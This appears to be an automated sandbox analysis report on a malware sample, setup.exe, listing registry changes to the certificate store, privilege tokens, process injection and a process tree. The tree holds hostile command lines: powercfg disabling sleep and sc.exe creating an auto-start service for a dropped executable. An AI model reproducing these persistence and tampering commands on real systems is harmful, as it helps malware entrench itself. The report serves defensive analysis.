cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	setup.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802025300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c00b000000010000001600000047006c006f00620061006c005300690067006e000000140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C	setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6	setup.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	setup.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c1d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b0b000000010000001600000047006c006f00620061006c005300690067006e0000005300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b060105050802020f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	setup.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	setup.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 0f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd	setup.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A	setup.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 0f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a2000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	setup.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2932	schtasks.exe
1940	schtasks.exe

Suspicious behavior: EnumeratesProcesses 29 IoCs

pid	Process
1988	setup.exe
2612	mU7W6dl3sKXezbfcRrChUNdG.exe
2832	iHZU061ECvv4QIP9wPjdodDB.exe
2652	powershell.exe
2492	powershell.exe
2320	H8Isy54p_ndScl17d9UwhXLY.exe
2320	H8Isy54p_ndScl17d9UwhXLY.exe
2832	iHZU061ECvv4QIP9wPjdodDB.exe
2220	MSBuild.exe
3060	CFIECFIJDA.exe
1636	explorti.exe
2220	MSBuild.exe
2612	mU7W6dl3sKXezbfcRrChUNdG.exe
2612	mU7W6dl3sKXezbfcRrChUNdG.exe
2612	mU7W6dl3sKXezbfcRrChUNdG.exe
2612	mU7W6dl3sKXezbfcRrChUNdG.exe
2612	mU7W6dl3sKXezbfcRrChUNdG.exe
2612	mU7W6dl3sKXezbfcRrChUNdG.exe
2612	mU7W6dl3sKXezbfcRrChUNdG.exe
2612	mU7W6dl3sKXezbfcRrChUNdG.exe
672	eqtpkqwqodik.exe
672	eqtpkqwqodik.exe
672	eqtpkqwqodik.exe
672	eqtpkqwqodik.exe
672	eqtpkqwqodik.exe
672	eqtpkqwqodik.exe
672	eqtpkqwqodik.exe
2220	MSBuild.exe
2220	MSBuild.exe

Suspicious use of AdjustPrivilegeToken 52 IoCs

description	pid	Process
Token: SeDebugPrivilege	2492	powershell.exe
Token: SeDebugPrivilege	2652	powershell.exe
Token: SeIncreaseQuotaPrivilege	2764	WMIC.exe
Token: SeSecurityPrivilege	2764	WMIC.exe
Token: SeTakeOwnershipPrivilege	2764	WMIC.exe
Token: SeLoadDriverPrivilege	2764	WMIC.exe
Token: SeSystemProfilePrivilege	2764	WMIC.exe
Token: SeSystemtimePrivilege	2764	WMIC.exe
Token: SeProfSingleProcessPrivilege	2764	WMIC.exe
Token: SeIncBasePriorityPrivilege	2764	WMIC.exe
Token: SeCreatePagefilePrivilege	2764	WMIC.exe
Token: SeBackupPrivilege	2764	WMIC.exe
Token: SeRestorePrivilege	2764	WMIC.exe
Token: SeShutdownPrivilege	2764	WMIC.exe
Token: SeDebugPrivilege	2764	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2764	WMIC.exe
Token: SeRemoteShutdownPrivilege	2764	WMIC.exe
Token: SeUndockPrivilege	2764	WMIC.exe
Token: SeManageVolumePrivilege	2764	WMIC.exe
Token: 33	2764	WMIC.exe
Token: 34	2764	WMIC.exe
Token: 35	2764	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2060	WMIC.exe
Token: SeSecurityPrivilege	2060	WMIC.exe
Token: SeTakeOwnershipPrivilege	2060	WMIC.exe
Token: SeLoadDriverPrivilege	2060	WMIC.exe
Token: SeSystemProfilePrivilege	2060	WMIC.exe
Token: SeSystemtimePrivilege	2060	WMIC.exe
Token: SeProfSingleProcessPrivilege	2060	WMIC.exe
Token: SeIncBasePriorityPrivilege	2060	WMIC.exe
Token: SeCreatePagefilePrivilege	2060	WMIC.exe
Token: SeBackupPrivilege	2060	WMIC.exe
Token: SeRestorePrivilege	2060	WMIC.exe
Token: SeShutdownPrivilege	2060	WMIC.exe
Token: SeDebugPrivilege	2060	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2060	WMIC.exe
Token: SeRemoteShutdownPrivilege	2060	WMIC.exe
Token: SeUndockPrivilege	2060	WMIC.exe
Token: SeManageVolumePrivilege	2060	WMIC.exe
Token: 33	2060	WMIC.exe
Token: 34	2060	WMIC.exe
Token: 35	2060	WMIC.exe
Token: SeDebugPrivilege	2320	H8Isy54p_ndScl17d9UwhXLY.exe
Token: SeShutdownPrivilege	324	powercfg.exe
Token: SeShutdownPrivilege	684	powercfg.exe
Token: SeShutdownPrivilege	2384	powercfg.exe
Token: SeShutdownPrivilege	2040	powercfg.exe
Token: SeShutdownPrivilege	532	powercfg.exe
Token: SeShutdownPrivilege	1812	powercfg.exe
Token: SeShutdownPrivilege	2360	powercfg.exe
Token: SeShutdownPrivilege	2304	powercfg.exe
Token: SeLockMemoryPrivilege	2240	svchost.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
1068	oGahnUQ3rh3YlX0uwwfEFaVl.tmp
3060	CFIECFIJDA.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2832	iHZU061ECvv4QIP9wPjdodDB.exe
1948	a3599e8794.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1988 wrote to memory of 2612	1988	setup.exe	32
PID 1988 wrote to memory of 2612	1988	setup.exe	32
PID 1988 wrote to memory of 2612	1988	setup.exe	32
PID 1988 wrote to memory of 2832	1988	setup.exe	36
PID 1988 wrote to memory of 2832	1988	setup.exe	36
PID 1988 wrote to memory of 2832	1988	setup.exe	36
PID 1988 wrote to memory of 2832	1988	setup.exe	36
PID 1988 wrote to memory of 2760	1988	setup.exe	33
PID 1988 wrote to memory of 2760	1988	setup.exe	33
PID 1988 wrote to memory of 2760	1988	setup.exe	33
PID 1988 wrote to memory of 2760	1988	setup.exe	33
PID 1988 wrote to memory of 2760	1988	setup.exe	33
PID 1988 wrote to memory of 2760	1988	setup.exe	33
PID 1988 wrote to memory of 2760	1988	setup.exe	33
PID 1988 wrote to memory of 1948	1988	setup.exe	35
PID 1988 wrote to memory of 1948	1988	setup.exe	35
PID 1988 wrote to memory of 1948	1988	setup.exe	35
PID 1988 wrote to memory of 2740	1988	setup.exe	34
PID 1988 wrote to memory of 2740	1988	setup.exe	34
PID 1988 wrote to memory of 2740	1988	setup.exe	34
PID 1988 wrote to memory of 2740	1988	setup.exe	34
PID 1988 wrote to memory of 2740	1988	setup.exe	34
PID 1988 wrote to memory of 2740	1988	setup.exe	34
PID 1988 wrote to memory of 2740	1988	setup.exe	34
PID 1988 wrote to memory of 2800	1988	setup.exe	37
PID 1988 wrote to memory of 2800	1988	setup.exe	37
PID 1988 wrote to memory of 2800	1988	setup.exe	37
PID 1988 wrote to memory of 2800	1988	setup.exe	37
PID 1988 wrote to memory of 2800	1988	setup.exe	37
PID 1988 wrote to memory of 2800	1988	setup.exe	37
PID 1988 wrote to memory of 2800	1988	setup.exe	37
PID 2760 wrote to memory of 1068	2760	oGahnUQ3rh3YlX0uwwfEFaVl.exe	38
PID 2760 wrote to memory of 1068	2760	oGahnUQ3rh3YlX0uwwfEFaVl.exe	38
PID 2760 wrote to memory of 1068	2760	oGahnUQ3rh3YlX0uwwfEFaVl.exe	38
PID 2760 wrote to memory of 1068	2760	oGahnUQ3rh3YlX0uwwfEFaVl.exe	38
PID 2760 wrote to memory of 1068	2760	oGahnUQ3rh3YlX0uwwfEFaVl.exe	38
PID 2760 wrote to memory of 1068	2760	oGahnUQ3rh3YlX0uwwfEFaVl.exe	38
PID 2760 wrote to memory of 1068	2760	oGahnUQ3rh3YlX0uwwfEFaVl.exe	38
PID 2800 wrote to memory of 2344	2800	w8VcQsjDmh1yU_gofgrWJrfe.exe	39
PID 2800 wrote to memory of 2344	2800	w8VcQsjDmh1yU_gofgrWJrfe.exe	39
PID 2800 wrote to memory of 2344	2800	w8VcQsjDmh1yU_gofgrWJrfe.exe	39
PID 2800 wrote to memory of 2344	2800	w8VcQsjDmh1yU_gofgrWJrfe.exe	39
PID 2800 wrote to memory of 2344	2800	w8VcQsjDmh1yU_gofgrWJrfe.exe	39
PID 2800 wrote to memory of 2344	2800	w8VcQsjDmh1yU_gofgrWJrfe.exe	39
PID 2800 wrote to memory of 2344	2800	w8VcQsjDmh1yU_gofgrWJrfe.exe	39
PID 2344 wrote to memory of 2368	2344	Install.exe	40
PID 2344 wrote to memory of 2368	2344	Install.exe	40
PID 2344 wrote to memory of 2368	2344	Install.exe	40
PID 2344 wrote to memory of 2368	2344	Install.exe	40
PID 2344 wrote to memory of 2368	2344	Install.exe	40
PID 2344 wrote to memory of 2368	2344	Install.exe	40
PID 2344 wrote to memory of 2368	2344	Install.exe	40
PID 2740 wrote to memory of 1200	2740	5eKJaFRFmKEoBuRF04Qht3K2.exe	41
PID 2740 wrote to memory of 1200	2740	5eKJaFRFmKEoBuRF04Qht3K2.exe	41
PID 2740 wrote to memory of 1200	2740	5eKJaFRFmKEoBuRF04Qht3K2.exe	41
PID 2740 wrote to memory of 1200	2740	5eKJaFRFmKEoBuRF04Qht3K2.exe	41
PID 2740 wrote to memory of 1200	2740	5eKJaFRFmKEoBuRF04Qht3K2.exe	41
PID 2740 wrote to memory of 1200	2740	5eKJaFRFmKEoBuRF04Qht3K2.exe	41
PID 2740 wrote to memory of 1200	2740	5eKJaFRFmKEoBuRF04Qht3K2.exe	41
PID 1200 wrote to memory of 2420	1200	Install.exe	42
PID 1200 wrote to memory of 2420	1200	Install.exe	42
PID 1200 wrote to memory of 2420	1200	Install.exe	42
PID 1200 wrote to memory of 2420	1200	Install.exe	42
PID 1200 wrote to memory of 2420	1200	Install.exe	42

C:\Users\Admin\AppData\Local\Temp\archive\setup.exe
"C:\Users\Admin\AppData\Local\Temp\archive\setup.exe"
1⤵
- Modifies firewall policy service
- Checks computer location settings
- Loads dropped DLL
- Drops file in System32 directory
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1988
- C:\Users\Admin\Documents\SimpleAdobe\mU7W6dl3sKXezbfcRrChUNdG.exe
  C:\Users\Admin\Documents\SimpleAdobe\mU7W6dl3sKXezbfcRrChUNdG.exe
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:2612
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:684
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:2384
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:324
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:2040
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "CIFUBVHI"
    3⤵
    - Launches sc.exe
    PID:2440
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "CIFUBVHI" binpath= "C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:2352
